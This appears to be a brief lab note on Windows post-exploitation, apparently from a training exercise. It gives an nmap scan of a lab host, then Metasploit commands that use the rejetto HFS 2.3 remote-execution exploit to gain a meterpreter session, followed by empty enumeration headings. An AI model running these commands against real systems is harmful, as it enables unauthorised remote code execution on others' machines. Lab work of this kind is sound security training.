win-post-exp
Enumeration & Exploitation
nmap -sV 10.2.16.155
80/tcp open http HttpFileServer httpd 2.3
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPCsearchsploit rejetto
service postgresql start && msfconsole -qsearch rejetto
use exploit/windows/http/rejetto_hfs_exec
setg RHOSTS 10.2.16.155
setg RHOST 10.2.16.155
run
meterpreter >Local Enumeration
System Information
Users & Groups

Network Information
Processes & Services

Automating Local Enum
Enumeration & Exploitation

Metasploit Post-Exploitation







JAWS



Last updated